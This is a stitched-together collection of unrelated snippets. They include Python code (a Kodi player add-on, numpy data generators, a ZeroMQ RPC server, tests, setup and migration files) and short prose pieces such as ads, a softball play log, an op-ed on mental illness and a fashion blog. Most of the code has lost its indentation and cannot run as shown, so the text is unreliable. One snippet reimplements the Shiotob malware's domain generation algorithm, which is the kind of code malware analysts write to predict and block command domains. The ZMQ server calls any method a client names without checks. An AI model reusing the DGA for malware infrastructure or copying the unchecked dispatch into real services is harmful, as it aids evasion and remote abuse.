params[lang][key + "_escaped+"] = value.replace(" ", "%252B")
pDialog = None
selection = None
try:
if len(players) > 1 and use_simple:
index = dialogs.select(_("Play using..."), [player.title for player in players])
if index == -1: return None
players = [players[index]]
resolve_f = lambda p : resolve_player(p, lister, params)
if len(players) > 1:
pool_size = plugin.get_setting(SETTING_POOL_SIZE, int)
populator = lambda : execute(resolve_f, players, lister.stop_flag, pool_size)
selection = dialogs.select_ext(_("Play using..."), populator, len(players))
else:
result = resolve_f(players[0])
if result:
title, links = result
if len(links) == 1: selection = links[0]
else:
index = dialogs.select(_("Play using..."), [x['label'] for x in links])
if index > -1: selection = links[index]
else: dialogs.ok(_("Error"), _("%s not found") % _("Video"))
finally: lister.stop()
return selection
def on_play_video(mode, players, params, trakt_ids=None):
if plugin.get_setting(SETTING_AUTOPATCH, bool) == True: patch("auto")
assert players
# Cancel resolve
action_cancel()
# Get video link
use_simple_selector = plugin.get_setting(SETTING_USE_SIMPLE_SELECTOR, bool)
is_extended = not (use_simple_selector or len(players) == 1)
if not is_extended: xbmc.executebuiltin("ActivateWindow(busydialog)")
try: selection = get_video_link(players, params, mode, use_simple_selector)
finally:
if not is_extended: xbmc.executebuiltin("Dialog.Close(busydialog)")
if not selection: return
# Get selection details
link = selection['path']
action = selection.get('action', '')
plugin.log.info('Playing url: %s' % to_utf8(link))
# Activate link
if action == "ACTIVATE": action_activate(link)
elif action == "RUN": action_run(link)
elif action == "PRERUN": action_prerun(link)
elif action == "PLAYMEDIA": action_playmedia(link)
elif action == "PRERUNRETURN": metaplayer().action_prerun(link)
else:
if trakt_ids: set_property('script.trakt.ids', json.dumps(trakt_ids))
return link
return None
def resolve_player(player, lister, params):
results = []
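    # player.commands is a list of command groups. Within a group, commands
    # are tried in order; once one yields results, the rest of the group is
    # skipped (the break below) and the group's results are accumulated.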
for command_group in player.commands:
if xbmc.abortRequested or not lister.is_active(): return
command_group_results = []
for command in command_group:
if xbmc.abortRequested or not lister.is_active(): return
lang = command.get("language", "en")
if not lang in params: continue
parameters = params[lang]
try:
link = apply_parameters(to_unicode(command["link"]), parameters)
except:
print_exc()
continue
if link == "movies" and player.media == "movies":
video = get_movie_from_library(parameters['imdb'])
if video:
command_group_results.append(video)
elif link == "tvshows" and player.media == "tvshows":
video = get_episode_from_library(parameters['id'], parameters['season'], parameters['episode'])
if not video:
video = get_episode_from_library(parameters['tmdb'], parameters['season'], parameters['episode'])
if video:
command_group_results.append(video)
elif not command.get("steps"):
command_group_results.append(
{
'label': player.title,
'path': urlencode_path(link),
'action': command.get("action", "PLAY")
}
)
else:
steps = [to_unicode(step) for step in command["steps"]]
files, dirs = lister.get(link, steps, parameters)
if command.get("action", "PLAY") == "ACTIVATE":
files += dirs
if files:
command_group_results += [
{
'label': f['label'],
'path': player.postprocess(f['path']),
'action': command.get("action", "PLAY")
} for f in files]
if command_group_results:
break
results += command_group_results
if results:
return player.title, results
class metaplayer(xbmc.Player):
def __init__(self):
xbmc.Player.__init__(self)
self.returnlink = xbmc.getInfoLabel('Container.FolderPath')
xbmc.log("returnlink: " + repr(self.returnlink), xbmc.LOGNOTICE)
def action_prerun(self, link):
# xbmc.executebuiltin('ActivateWindow(10025,addons://user/xbmc.addon.video/plugin.video.zen/,return)')
if link.startswith("plugin://"):
id = link.split("/")
xbmc.executebuiltin('RunAddon(%s)' % id[2])
while xbmc.getInfoLabel('Container.PluginName') != id[2] or xbmc.getCondVisibility('Window.IsActive(busydialog)'): xbmc.sleep(250)
xbmc.sleep(250)
self.play(link)
while xbmc.getInfoLabel('Container.PluginName') == id[2] and xbmc.getInfoLabel('Container.FolderPath') != "plugin://%s/" % id[2] and id[2] in xbmc.getInfoLabel('Container.FolderPath'):
xbmc.sleep(250)
if xbmc.getInfoLabel('Container.FolderPath') == "plugin://%s/" % id[2] or id[2] not in xbmc.getInfoLabel('Container.FolderPath'):
break
xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink)
def onPlayBackEnded(self):
xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink)
def onPlayBackStopped(self):
xbmc.executebuiltin('Container.Update("%s", replace)' % self.returnlink) |
Knowledge of solid state electronics, the operational design of circuits, and electronic testing equipment. Knowledge of digital technology. Knowledge of state and federal two-way radio regulations. Ebook free: The Electronics of Radio (Pap/Dskt) [Paperback] by David Rutledge, from Cambridge University Press. Never doubt our offer, because we will always provide just what you require.
14/09/2007: There is a related book called "The Science of Radio" by Paul J. Nahin (who has written a couple of other interesting books). In fact, David Rutledge, the author of "The Electronics of Radio", mentions this book in his introduction; of course, it is obvious that they have similar titles. |
import numpy as np
from numpy import loadtxt as loadtxt
from numpy import asarray as arr
from numpy import asmatrix as mat
from numpy import atleast_2d as twod
from scipy.linalg import sqrtm
################################################################################
## Methods for creating / sampling synthetic datasets ##########################
################################################################################
def data_gauss(N0, N1=None, mu0=arr([0, 0]), mu1=arr([1, 1]), sig0=np.eye(2), sig1=np.eye(2)):
"""Sample data from a two-component Gaussian mixture model.
Args:
N0 (int): Number of data to sample for class -1.
N1 :(int) Number of data to sample for class 1.
mu0 (arr): numpy array
mu1 (arr): numpy array
sig0 (arr): numpy array
sig1 (arr): numpy array
Returns:
X (array): Array of sampled data
Y (array): Array of class values that correspond to the data points in X.
TODO: test more
"""
if not N1:
N1 = N0
d1,d2 = twod(mu0).shape[1],twod(mu1).shape[1]
if d1 != d2 or np.any(twod(sig0).shape != arr([d1, d1])) or np.any(twod(sig1).shape != arr([d1, d1])):
raise ValueError('data_gauss: dimensions should agree')
X0 = np.dot(np.random.randn(N0, d1), sqrtm(sig0))
X0 += np.ones((N0,1)) * mu0
Y0 = -np.ones(N0)
X1 = np.dot(np.random.randn(N1, d1), sqrtm(sig1))
X1 += np.ones((N1,1)) * mu1
Y1 = np.ones(N1)
X = np.row_stack((X0,X1))
Y = np.concatenate((Y0,Y1))
return X,Y
def data_GMM(N, C, D=2, get_Z=False):
"""Sample data from a Gaussian mixture model.
Builds a random GMM with C components and draws M data x^{(i)} from a mixture
of Gaussians in D dimensions
Args:
N (int): Number of data to be drawn from a mixture of Gaussians.
C (int): Number of clusters.
D (int): Number of dimensions.
        get_Z (bool): If True, also returns an array indicating the cluster from
            which each data point was drawn.
Returns:
X (arr): N x D array of data.
Z (arr): 1 x N array of cluster ids; returned also only if get_Z=True
TODO: test more; N vs M
"""
C += 1
pi = np.zeros(C)
for c in range(C):
pi[c] = gamrand(10, 0.5)
pi = pi / np.sum(pi)
cpi = np.cumsum(pi)
rho = np.random.rand(D, D)
rho = rho + twod(rho).T
rho = rho + D * np.eye(D)
rho = sqrtm(rho)
    mu = mat(np.random.randn(C - 1, D)) * mat(rho)  # after the loop above, c == C - 1; make that explicit
ccov = []
for i in range(C):
tmp = np.random.rand(D, D)
tmp = tmp + tmp.T
tmp = 0.5 * (tmp + D * np.eye(D))
ccov.append(sqrtm(tmp))
p = np.random.rand(N)
Z = np.ones(N)
for c in range(C - 1):
Z[p > cpi[c]] = c
Z = Z.astype(int)
X = mu[Z,:]
for c in range(C):
X[Z == c,:] = X[Z == c,:] + mat(np.random.randn(np.sum(Z == c), D)) * mat(ccov[c])
if get_Z:
return (arr(X),Z)
else:
return arr(X)
def gamrand(alpha, lmbda):
"""Gamma(alpha, lmbda) generator using the Marsaglia and Tsang method
Args:
alpha (float): scalar
lambda (float): scalar
Returns:
(float) : scalar
TODO: test more
"""
# (algorithm 4.33).
if alpha > 1:
d = alpha - 1 / 3
c = 1 / np.sqrt(9 * d)
flag = 1
while flag:
Z = np.random.randn()
if Z > -1 / c:
V = (1 + c * Z)**3
U = np.random.rand()
flag = np.log(U) > (0.5 * Z**2 + d - d * V + d * np.log(V))
return d * V / lmbda
else:
x = gamrand(alpha + 1, lmbda)
return x * np.random.rand()**(1 / alpha)
def data_mouse():
"""Simple by-hand data generation using the GUI
Opens a matplotlib plot window, and allows the user to specify points with the mouse.
Each button is its own class (1,2,3); close the window when done creating data.
Returns:
X (arr): Mx2 array of data locations
Y (arr): Mx1 array of labels (buttons)
"""
import matplotlib.pyplot as plt
fig = plt.figure()
ax = fig.add_subplot(111, xlim=(-1,2), ylim=(-1,2))
X = np.zeros( (0,2) )
Y = np.zeros( (0,) )
col = ['bs','gx','ro']
def on_click(event):
X.resize( (X.shape[0]+1,X.shape[1]) )
X[-1,:] = [event.xdata,event.ydata]
Y.resize( (Y.shape[0]+1,) )
Y[-1] = event.button
ax.plot( event.xdata, event.ydata, col[event.button-1])
fig.canvas.draw()
fig.canvas.mpl_connect('button_press_event',on_click)
plt.show()
return X,Y
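if __name__ == '__main__':
    # Quick usage sketch (not part of the original module): draw a two-class
    # Gaussian sample with the default means and covariances defined above.
    X, Y = data_gauss(50)
    print(X.shape)  # (100, 2): 50 points per class
    print(set(Y))   # {-1.0, 1.0}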
|
Summary of connections information collated from the reference "Anatomical studies on the nucleus reticularis tegmenti pontis in the pigmented rat. II. Subcortical afferents demonstrated by the retrograde transport of horseradish peroxidase" by Torigoe Y, Blanks RH and Precht W, published in J Comp Neurol. |
#coding:utf-8
import zmq
import json
context = zmq.Context()
class Server(object):
def __init__(self, port):
self.server = context.socket(zmq.REP)
self.server.bind("tcp://*:{0}".format(port))
def run(self):
print "ready"
while True:
recv = self.server.recv()
recv_dict = json.loads(recv)
func = recv_dict['func']
arg = recv_dict['arg']
try:
if arg:
return_main = getattr(self, func)(*arg)
else:
return_main = getattr(self, func)()
except Exception, ex:
return_main = None
return_error = str(ex)
else:
return_error = None
finally:
self.server.send(json.dumps({"main": return_main, "error":return_error}))
class AsyncServer(object):
def __init__(self, port):
self.server = context.socket(zmq.PULL)
self.server.bind("tcp://*:{0}".format(port))
def run(self):
print "ready"
while True:
recv = self.server.recv()
recv_dict = json.loads(recv)
func = recv_dict['func']
arg = recv_dict['arg']
try:
if arg:
return_main = getattr(self, func)(*arg)
else:
return_main = getattr(self, func)()
except Exception, ex:
                print ex
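if __name__ == '__main__':
    # Minimal demo sketch (not part of the original module). Server is meant
    # to be subclassed with the methods it should expose; the "ping" method
    # and port 5555 here are hypothetical choices for illustration.
    import threading

    class PingServer(Server):
        def ping(self):
            return "pong"

    server = PingServer(5555)
    t = threading.Thread(target=server.run)
    t.daemon = True
    t.start()

    client = context.socket(zmq.REQ)
    client.connect("tcp://localhost:5555")
    client.send(json.dumps({"func": "ping", "arg": None}))
    print json.loads(client.recv())  # e.g. {u'main': u'pong', u'error': None}
|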
Download Free Mp3: Mp3 Download Player. All of the video/mp3 files that appear on this comemp3.com website were found on the internet. The webmaster does not hold any legal rights of ownership over them. We don't save/host these Mp3 Download Player videos/mp3s on our hosting. If any of them is in any way offensive to you, please contact us to ask for its removal. |
import argparse
def get_next_domain(domain):
qwerty = 'qwertyuiopasdfghjklzxcvbnm123945678'
def sum_of_characters(domain):
return sum([ord(d) for d in domain[:-3]])
sof = sum_of_characters(domain)
ascii_codes = [ord(d) for d in domain] + 100*[0]
old_hostname_length = len(domain) - 4
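    # Mixing stage: for each index pair (i, j) with j + i < 65, combine the
    # code at position j (scaled by the old hostname length) with the code at
    # position j + i and the character-sum checksum, keeping only the low byte.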
for i in range(0, 66):
for j in range(0, 66):
edi = j + i
if edi < 65:
p = (old_hostname_length * ascii_codes[j])
cl = p ^ ascii_codes[edi] ^ sof
ascii_codes[edi] = cl & 0xFF
"""
calculate the new hostname length
max: 255/16 = 15
min: 10
"""
cx = ((ascii_codes[2]*old_hostname_length) ^ ascii_codes[0]) & 0xFF
hostname_length = int(cx/16) # at most 15
if hostname_length < 10:
hostname_length = old_hostname_length
"""
generate hostname
"""
for i in range(hostname_length):
index = int(ascii_codes[i]/8) # max 31 --> last 3 chars of qwerty unreachable
bl = ord(qwerty[index])
ascii_codes[i] = bl
hostname = ''.join([chr(a) for a in ascii_codes[:hostname_length]])
"""
append .net or .com (alternating)
"""
tld = '.com' if domain.endswith('.net') else '.net'
domain = hostname + tld
return domain
if __name__=="__main__":
""" example seed domain: 4ypv1eehphg3a.com """
parser = argparse.ArgumentParser(description="DGA of Shiotob")
parser.add_argument("domain", help="initial domain")
args = parser.parse_args()
domain = args.domain
for i in range(2001):
print(domain)
domain = get_next_domain(domain)
|
Protein Station Almond Fudge Brownie: made with almond flour, nuts, dark chocolate, high-quality whey protein and a secret blend to give you a nutrition bar like no other!
Definitely the best flavor of the Protein Station assortment. Tastes like a brownie but is super healthy.
Really happy with the taste and nutrition. One of the best protein bars from Protein Station. |
__docformat__ = "restructuredtext"
class peekable:
"""Make an iterator peekable.
This is implemented with an eye toward simplicity. On the downside,
you can't do things like peek more than one item ahead in the
iterator. On the bright side, it doesn't require anything from
itertools, etc., so it's less likely to encounter strange bugs,
    which occasionally do happen.
Example usage::
>>> numbers = peekable(range(6))
>>> numbers.next()
0
>>> numbers.next()
1
>>> numbers.peek()
2
>>> numbers.next()
2
>>> numbers.next()
3
>>> for i in numbers:
... print i
...
4
5
"""
_None = () # Perhaps None is a valid value.
def __init__(self, iterable):
self._iterable = iter(iterable)
self._buf = self._None
def __iter__(self):
return self
def _is_empty(self):
return self._buf is self._None
def peek(self):
"""Peek at the next element.
This may raise StopIteration.
"""
if self._is_empty():
self._buf = self._iterable.next()
return self._buf
def next(self):
if self._is_empty():
return self._iterable.next()
ret = self._buf
self._buf = self._None
return ret
def groupbysorted(iterable, keyfunc=None):
"""This is a variation of itertools.groupby.
The itertools.groupby iterator assumes that the input is not sorted
but will fit in memory. This iterator has the same API, but assumes
the opposite.
Example usage::
>>> for (key, subiter) in groupbysorted(
... ((1, 1), (1, 2), (2, 1), (2, 3), (2, 9)),
... keyfunc=lambda row: row[0]):
... print "New key:", key
... for x in subiter:
... print "Row:", x
...
New key: 1
Row: (1, 1)
Row: (1, 2)
New key: 2
Row: (2, 1)
Row: (2, 3)
Row: (2, 9)
This requires the peekable class. See my comment here_.
Note, you must completely iterate over each subiter or groupbysorted will
get confused.
.. _here:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/304373
"""
iterable = peekable(iterable)
if not keyfunc:
def keyfunc(x):
return x
def peekkey():
return keyfunc(iterable.peek())
def subiter():
while True:
if peekkey() != currkey:
break
yield iterable.next()
while True:
currkey = peekkey()
yield (currkey, subiter())
|
Mallory McArtor doubled down the lf line.
Allie O'Brien doubled down the lf line, RBI; Mallory McArtor scored.
Arends, Taylor , runner left early.
Mehrle, Hannah doubled to right center.
Maliah Fligg singled down the rf line.
Brenna Winn pinch ran for Maliah Fligg.
Maliah Fligg to p for Brenna Winn.
Tang, Hera singled to right field.
Arredondo, Mikaela singled to right field; Tang, Hera advanced to second.
Gauden, Mackenzie reached on a fielder's choice, bunt; Arredondo, Mikaela advanced to third; Tang, Hera out at home p to c.
James, Kenzie reached first on a fielding error by 2b.
Arends, Taylor singled; James, Kenzie advanced to third.
Jess Brooks doubled to left center.
Allie O'Brien doubled to right field.
Haley Jones tripled down the rf line.
Maliah Fligg reached on a fielder's choice, advanced to second on the error; Haley Jones scored on a throwing error by 3b, unearned.
McKee, Anna to p for Clapp, Maggie.
Sara Czachowski pinch hit for Paige Wieland.
Paige Wieland to rf for Sara Czachowski.
Clapp, Maggie to p for McKee, Anna. |
import threadly, time, random
import unittest
clf = 0
llf = 0
def callLF(lf):
# print "CALLED"
lf.setter(True)
def listenFromFuture():
global llf
# print "GotCalled"
llf +=1
def callFromFuture(s):
global clf
# print "GotCalled", s
clf +=1
def listenException():
raise Exception("TEST1")
def callException(s):
raise Exception("TEST1")
class TestFutures(unittest.TestCase):
def test_futureTest1(self):
global clf, llf
sch = threadly.Scheduler(10)
LF1 = threadly.ListenableFuture()
LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
LF2.add_listener(listenFromFuture)
LF2.add_callable(callFromFuture)
LF1.add_listener(listenFromFuture)
LF1.add_callable(callFromFuture)
self.assertTrue(LF1.get())
self.assertTrue(LF2.get())
self.assertEquals(2, llf)
self.assertEquals(2, clf)
LF2.add_listener(listenFromFuture)
LF2.add_callable(callFromFuture)
LF1.add_listener(listenFromFuture)
LF1.add_callable(callFromFuture)
self.assertEquals(4, llf)
self.assertEquals(4, clf)
sch.shutdown()
def test_futureCallerExceptions(self):
global clf, llf
sch = threadly.Scheduler(10)
LF1 = threadly.ListenableFuture()
LF1.add_listener(listenException)
LF1.add_listener(listenException)
LF1.add_callable(callException)
LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
self.assertTrue(LF1.get())
self.assertTrue(LF2.get())
sch.shutdown()
def test_futureDoubleSet(self):
global clf, llf
sch = threadly.Scheduler(10)
LF1 = threadly.ListenableFuture()
LF2 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
self.assertTrue(LF1.get())
self.assertTrue(LF2.get())
LF3 = sch.schedule_with_future(callLF, delay=100, args=(LF1,))
self.assertFalse(LF3.get())
self.assertEquals(10, sch.get_poolsize())
sch.shutdown()
if __name__ == '__main__':
unittest.main()
|
Robert M. Corless and I are pleased to announce the publication of a new graduate textbook in applied mathematics, entitled A Graduate Introduction to Numerical Methods, From the Viewpoint of Backward Error Analysis. The book is currently available in stores.
The book has made the Notable Computing Books and Articles of 2013 list of the ACM Computing Reviews in the "Mathematics of Computing" section. Computing Reviews' Best of 2013 list consists of book and article nominations from their reviewers, Computing Reviews category editors, the editors in chief of journals they cover, and others in the computing community.
The book has also been featured in a positive review by Nick Higham, one of the leaders in the field of numerical analysis and applied mathematics.
To access the Matlab and Maple codes used in this book, consult the code repository.
Publisher: Springer. 868 p. 199 illus., 6 illus. in color. ISBN 978-1-4614-8452-3.
It is available as ebook.
The book is available for pre-order at many places, including Springer ($99 USD), Amazon.com ($79.17 USD) and Amazon.ca ($81.63 CAD). Overall, you can find the cheapest copy by using the metasearch engine bookfinder.com. We also encourage people to get a copy for $25 only using Springer's My Copy service.
Contents: Computer Arithmetic & Fundamental Concepts of Computation.- Polynomials and Series.- Rootfinding and Function Evaluation.- Solving Ax = b.- Solving Ax = x.- Structured Linear Systems.- Iterative Methods.- Polynomial and Rational Interpolation.- The Discrete Fourier Transform.- Numerical Integration.- Numerical Differentiation and Finite Differences.- Numerical Solution of ODEs.- Numerical Methods for ODEs.- Numerical Solutions of Boundary Value Problems.- Numerical Solution of Delay DEs.- Numerical Solution of PDEs.
This book provides an extensive introduction to numerical computing from the viewpoint of backward error analysis. The intended audience includes students and researchers in science, engineering and mathematics. The approach taken is somewhat informal owing to the wide variety of backgrounds of the readers, but the central ideas of backward error and sensitivity (conditioning) are systematically emphasized. The book is divided into four parts: Part I provides the background preliminaries including floating-point arithmetic, polynomials and computer evaluation of functions; Part II covers numerical linear algebra; Part III covers interpolation, the FFT and quadrature; and Part IV covers numerical solutions of differential equations including initial-value problems, boundary-value problems, delay differential equations and a brief chapter on partial differential equations. The book contains detailed illustrations, chapter summaries and a variety of exercises as well as some Matlab codes provided online as supplementary material.
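To make the book's central idea concrete, here is a small illustration of our own (a sketch, not an excerpt from the book): for a computed solution x_hat of Ax = b, the normwise relative backward error ||b - A x_hat|| / (||A|| ||x_hat||) measures how small a perturbation of A would make x_hat an exact solution, and a backward stable solver keeps this quantity near machine precision.

import numpy as np
A = np.array([[1e4, 1.0], [1.0, 1.0]])
b = np.array([1.0, 2.0])
x_hat = np.linalg.solve(A, b)  # computed solution
r = b - A.dot(x_hat)           # residual
eta = np.linalg.norm(r) / (np.linalg.norm(A) * np.linalg.norm(x_hat))
print(eta)  # on the order of 1e-16, i.e. near machine epsilon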
Download a preliminary sample of the book!
Corless, R.M. & Fillion, N. (2013). A Graduate Introduction to Numerical Methods, From the Viewpoint of Backward Error Analysis, Springer. |
# Test methods with long descriptive names can omit docstrings
# pylint: disable=missing-docstring
import unittest
import numpy as np
from scipy.sparse import csr_matrix
from Orange.data import Table, Variable
from Orange.preprocess.score import ANOVA, Gini, UnivariateLinearRegression, \
Chi2
from Orange.preprocess import SelectBestFeatures, Impute, RemoveNaNColumns, SelectRandomFeatures
class TestFSS(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.titanic = Table('titanic')
cls.wine = Table('wine')
cls.iris = Table('iris')
        cls.auto_mpg = Table('auto-mpg')
def setUp(self):
Variable._clear_all_caches()
def test_select_1(self):
gini = Gini()
s = SelectBestFeatures(method=gini, k=1)
data2 = s(self.titanic)
best = max((gini(self.titanic, f), f) for f in self.titanic.domain.attributes)[1]
self.assertEqual(data2.domain.attributes[0], best)
def test_select_threshold(self):
anova = ANOVA()
t = 30
data2 = SelectBestFeatures(method=anova, threshold=t)(self.wine)
self.assertTrue(all(anova(self.wine, f) >= t for f in data2.domain.attributes))
def test_error_when_using_regression_score_on_classification_data(self):
s = SelectBestFeatures(method=UnivariateLinearRegression(), k=3)
with self.assertRaises(ValueError):
s(self.wine)
def test_discrete_scores_on_continuous_features(self):
c = self.iris.columns
for method in (Gini(), Chi2()):
d1 = SelectBestFeatures(method=method)(self.iris)
expected = \
(c.petal_length, c.petal_width, c.sepal_length, c.sepal_width)
self.assertSequenceEqual(d1.domain.attributes, expected)
scores = method(d1)
self.assertEqual(len(scores), 4)
score = method(d1, c.petal_length)
self.assertIsInstance(score, float)
def test_continuous_scores_on_discrete_features(self):
        data = Impute()(self.auto_mpg)
with self.assertRaises(ValueError):
UnivariateLinearRegression()(data)
d1 = SelectBestFeatures(method=UnivariateLinearRegression())(data)
self.assertEqual(len(d1.domain), len(data.domain))
def test_defaults(self):
fs = SelectBestFeatures(k=3)
        data2 = fs(Impute()(self.auto_mpg))
self.assertTrue(all(a.is_continuous for a in data2.domain.attributes))
data2 = fs(self.wine)
self.assertTrue(all(a.is_continuous for a in data2.domain.attributes))
data2 = fs(self.titanic)
self.assertTrue(all(a.is_discrete for a in data2.domain.attributes))
class TestRemoveNaNColumns(unittest.TestCase):
def test_column_filtering(self):
data = Table("iris")
data.X[:, (1, 3)] = np.NaN
new_data = RemoveNaNColumns()(data)
self.assertEqual(len(new_data.domain.attributes),
len(data.domain.attributes) - 2)
data = Table("iris")
data.X[0, 0] = np.NaN
new_data = RemoveNaNColumns()(data)
self.assertEqual(len(new_data.domain.attributes),
len(data.domain.attributes))
def test_column_filtering_sparse(self):
data = Table("iris")
data.X = csr_matrix(data.X)
new_data = RemoveNaNColumns()(data)
self.assertEqual(data, new_data)
class TestSelectRandomFeatures(unittest.TestCase):
def test_select_random_features(self):
data = Table("voting")
for k_features, n_attributes in ((3, 3), (0.25, 4)):
srf = SelectRandomFeatures(k=k_features)
new_data = srf(data)
self.assertEqual(len(new_data.domain.attributes), n_attributes)
|
Last Tuesday a shooting occurred at Emerald Park in Eugene, leaving two men dead — one of whom was the shooter — and one severely injured. The shooter has been identified as a former Army veteran, and police have begun to investigate the reasons as to why this shooting occurred.
According to the veteran’s neighbor, the man had severe PTSD, and police confirmed that he had been in legal trouble since his return from serving three tours in Iraq. These legal troubles included two counts of unlawful abuse of a firearm dating back to August 2015.
Found in his home dead from what appears to be a self-inflicted gunshot wound, the former Army veteran has shaken up the local community with everyone asking why such a horrific event could occur — looking for something or someone to place blame on.
Some will question his background, some will question his religion, but many will be too quick to over-simplify their judgements about mental illness.
Mental illness is a source of contention between scientists and mainstream media. One side has the ability to conduct extensive research in order to understand the complexities of the human psyche and reactions to its environment. The other pushes easy-to-believe, harmful propaganda that demonizes issues rather than attempting to fully understand them.
A massively common misconception about mental illnesses and disorders such as PTSD, schizophrenia and bipolar disorder is that they are directly related to violence, and that people with these conditions are volatile cocktails waiting to explode. This is not the case.
According to scientists all over the globe, mental disorders such as PTSD, schizophrenia and bipolar disorder are not nearly as strongly linked to violence as everyday media portrays.
The news media in every form relishes jumping on a story that will immediately grab audiences. It’s hard to blame them for that. It is the goal of media to get the word out to as many people as possible — but what if that word is completely misleading, harmful or flat-out wrong?
The real danger at play is the stigma associated with mental illness. Mass shootings and violent crimes happen — but when the blame is shifted to the mental illness of an individual, instead of taking all factors into account, it results in the demonization of a massive number of people who are combating disorders that, in almost all cases, do not lead to violence.
A study released by Jeffrey Swanson and three other prominent psychiatric and psychological scientists stated “Epidemiologic studies show that the large majority of people with serious mental illnesses are never violent.” Often, people who have serious mental illnesses are more likely to be the victim of a violent attack than the aggressor. The study shows that the association between gun violence and mental illness is driven largely by suicide.
This shouldn’t come as a surprise. These people are having to exist in a world that has developed shallow, demonizing labels in a form of pseudo-bullying that claims their “kind” are responsible for mass shootings, deaths and tragedy that a majority of us would never think to commit in the first place.
Every time the news and social media portray mental disorders as violent, unpredictable and dangerous it becomes a counterproductive measure to rehabilitation and further postpones our understanding on how to treat these disorders. If the community does not attempt to become more educated, the stigma on mental illness will continue to jeopardize the treatment of those suffering. |
#! /usr/bin/env python
###############################################################################
##
## GINKGO Biogeographical Evolution Simulator Post-Processing Library.
##
## Copyright 2009 Jeet Sukumaran and Mark T. Holder.
##
## This program is free software; you can redistribute it and#or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License along
## with this program. If not, see <http:##www.gnu.org#licenses#>.
##
###############################################################################
"""
Package setup and installation.
"""
import ez_setup
ez_setup.use_setuptools()
from setuptools import setup
from setuptools import find_packages
from ginkgo import PACKAGE_VERSION
import sys
import os
import subprocess
script_names = ['ginkgo-ascii-grid.py', 'ginkgo-grid-coordinates.py']
setup(name='Ginkgo',
version=PACKAGE_VERSION,
author='Jeet Sukumaran and Mark T. Holder',
author_email='[email protected] and [email protected]',
url='',
description="""\
    A library to facilitate setting up runs and processing results of the GINKGO Biogeographical Evolution Simulator""",
license='GPL 3+',
packages=['ginkgo'],
package_dir={'ginkgo': 'ginkgo'},
package_data={
"" : ['doc/*'],
"ginkgo" : ["tests/data/*"]
},
scripts = [('scripts/%s' % i) for i in script_names],
test_suite = "ginkgo.tests",
include_package_data=True,
zip_safe=True,
install_requires=[
"DendroPy >= 3.0.0",
],
entry_points="""
# -*- Entry points: -*-
""",
long_description=open('README.txt', 'rU').read(),
classifiers = [
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: GNU General Public License (GPL)",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Scientific/Engineering :: Bio-Informatics",
],
keywords='phylogenetics evolution biology biogeography',
)
|
We’ve been hard at work tending to our Projects In Place beehives! These are the supers we fabricated at the ING booth at the EPIC Sustainability Fair. Thanks again to everyone who helped out. The bees are doing great!
Having fun building our first beehive. Thanks to all of those who came to EPIC and gave us a hand! |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-01-21 11:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('core', '0012_auto_20180121_1155')
]
    state_operations = [
migrations.CreateModel(
name='Extract',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_name', models.CharField(max_length=30, verbose_name='Name')),
('date', models.DateField(verbose_name='Date')),
('money', models.DecimalField(decimal_places=2, max_digits=12, verbose_name='Money')),
('description', models.CharField(max_length=70, verbose_name='Description')),
('category', models.CharField(max_length=70, verbose_name='Category')),
('payment', models.CharField(max_length=70, verbose_name='Payment')),
],
options={
'ordering': ['-date'],
},
),
]
    operations = [
        migrations.SeparateDatabaseAndState(state_operations=state_operations)
    ]
|
With sci-fi imperial armored apparel, Gareth Pugh enables clients to roam planet earth with superb confidence. Live art in motion “the lovely Daphne Guinness” is an avid fan of Gareth Pugh. For her exhibit at the FIT Museum, she carefully chose pieces from Gareth Pugh’s collections, most notably a remarkable spiked-leather cat-suit from Fall 2009.
Pugh continually amazes fans with his trademark monochrome prints, geometrically cut stripe patterns, (his use of latex, sheer plastic and leather) and ultra-luxe voluminous fabric design. It brings me great pleasure to present Gareth Pugh, present to 2007.
SPRING 2012: A pleasant display of window-blinds effect dresses, vests and jackets and caged garments.
FALL 2011: Spring 2011 reminiscence of exoskeleton suits and vibrant metallic stripes.
SPRING 2011: Marvelous exoskeleton suits, sheer dresses and tapered blazers.
FALL 2010: Domineering leather bandage dress. A magnificent floor-length draped long-sleeve shirt paired with shiny pants. Provocative striped cowl-neck sheer tunic dress. Demure leather-n-wool train dress. Chain dresses and pants bear a nostalgic resemblance to The Maid of New Orléans (Joan of Arc) and an attractively New Age long crochet cardigan.
SPRING 2010: Zipper-embellished vests and jackets with elongated tails and rebelliously futuristic shredded dresses.
FALL 2009: Glorious spiked-leather ensembles mixed with Helmut Lang idealism.
SPRING 2009: Unparalleled texture and visual effects.
FALL 2008: Ode to Japanese samurai armor. Mongolian ruler Genghis Khan gets a feminized makeover.
SPRING 2008: Alluring to the eyes as a multifaceted deep-sea creäture are the sparkles that hug this lycra ribbed dress.
FALL 2007: A mirrored patent-leather dress is “melancholically romantic” to the likes of Alexander McQueen.
SPRING 2007: Alice in Wonderland meets Alexander McQueen in this cowl-neck checkered dress.
VERSACE (Metal-Heeled Leather Ankle Boots): The spirit of Gareth Pugh in a pair of leather boots that complement skinny trousers, stove-pipe jeans, leather or latex jeggings, wool or cashmere sweaters, long cardigans, draped jerseys or racer-back tunics. |
from lib.sino import db
import lingpyd as lingpy
numbersup = '¹²³⁴⁵⁶⁰'
numbersdown = '₁₂₃₄₅₆₀'
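# The two strings above map subscript digits to their superscript forms;
# Bai entries apparently encode tone numbers as subscripts, which the loop
# below normalises to superscripts.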
for k in db:
subgroup = db[k,'subgroup']
if subgroup == 'Bai':
# modify tokens
tks = db[k,'tokens']
if tks not in ['-','']:
tks = tks.split(' ')
ntk = []
while tks:
